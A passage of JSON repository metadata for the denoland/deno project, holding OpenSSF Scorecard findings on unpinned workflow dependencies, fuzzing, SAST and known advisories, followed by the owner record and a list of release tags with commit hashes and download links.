.github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags